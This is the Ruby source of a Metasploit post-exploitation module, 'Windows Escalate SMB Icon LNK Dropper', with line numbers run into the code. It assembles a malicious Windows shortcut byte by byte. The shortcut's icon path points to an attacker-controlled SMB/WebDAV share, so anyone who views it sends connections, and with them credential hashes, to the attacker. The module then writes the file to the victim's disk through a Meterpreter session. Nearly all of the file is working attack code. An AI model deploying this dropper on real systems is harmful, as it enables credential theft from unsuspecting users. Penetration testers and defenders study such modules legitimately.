Path: blob/master/modules/post/windows/escalate/droplnk.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Windows Escalate SMB Icon LNK Dropper',12'Description' => %q{13This module drops a shortcut (LNK file) that has a ICON reference14existing on the specified remote host, causing SMB and WebDAV15connections to be initiated from any user that views the shortcut.16},17'License' => MSF_LICENSE,18'Author' => [ 'mubix' ],19'Platform' => [ 'win' ],20'SessionTypes' => [ 'meterpreter' ],21'Compat' => {22'Meterpreter' => {23'Commands' => %w[24core_channel_eof25core_channel_open26core_channel_read27core_channel_write28stdapi_fs_getwd29]30}31},32'Notes' => {33'Stability' => [CRASH_SAFE],34'SideEffects' => [ARTIFACTS_ON_DISK],35'Reliability' => []36}37)38)39register_options(40[41OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),42OptString.new('LNKFILENAME', [ true, "Shortcut's filename", 'Words.lnk']),43OptString.new('SHARENAME', [ true, 'Share name on LHOST', 'share1']),44OptString.new('ICONFILENAME', [ true, "File name on LHOST's share", 'icon.png'])45]46)47end4849def run50print_status 'Creating evil LNK'51lnk = ''52lnk << "\x4c\x00\x00\x00" # Header size53lnk << "\x01\x14\x02\x00\x00\x00\x00\x00" # Link CLSID54lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"55lnk << "\xdb\x00\x00\x00" # Link flags56lnk << "\x20\x00\x00\x00" # File attributes57lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Creation time58lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Access time59lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Write time60lnk << "\x00\x00\x00\x00" # File size61lnk << "\x00\x00\x00\x00" # Icon index62lnk << "\x01\x00\x00\x00" # Show command63lnk << "\x00\x00" # Hotkey64lnk << "\x00\x00" # Reserved65lnk << "\x00\x00\x00\x00" # Reserved66lnk << "\x00\x00\x00\x00" # Reserved67lnk << "\x7b\x00" # IDListSize68# sIDList69lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"70lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"71lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"72lnk << 'C:\\'73lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"74lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"75lnk << "\x00"76lnk << 'AUTOEXEC.BAT'77lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"78lnk << "\x5b\x15\x14\x00\x00\x00"79lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')80lnk << "\x00\x00\x1c\x00\x00\x00"81# sLinkInfo82lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"83lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"84lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"85lnk << "\x00\x00\x00"86lnk << 'C:\\AUTOEXEC.BAT'87lnk << "\x00\x00\x0e\x00"88# RELATIVE_PATH89lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')90lnk << "\x03\x00"91# WORKING_DIR92lnk << Rex::Text.to_unicode('C:\\')93# ICON LOCATION94lnk << "\x1c\x00"95lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`")96lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"97lnk << 'computer'98lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"99lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"100lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"101lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"102lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"103104print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"105file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')106file.write(lnk)107file.close108print_status 'Done. Wait for evil to happen..'109end110end111112113